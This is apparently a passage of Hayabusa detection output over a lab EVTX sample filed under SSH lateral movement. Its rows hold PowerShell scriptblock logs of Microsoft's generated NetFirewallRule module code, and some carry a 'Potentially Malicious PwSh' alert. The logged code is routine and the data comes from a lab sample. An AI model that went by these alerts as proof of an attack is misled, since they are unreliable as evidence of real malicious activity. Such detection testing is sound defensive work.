${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and 
$PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] 
${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 
'MSFT_NetFirewallRuleFilterByInter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 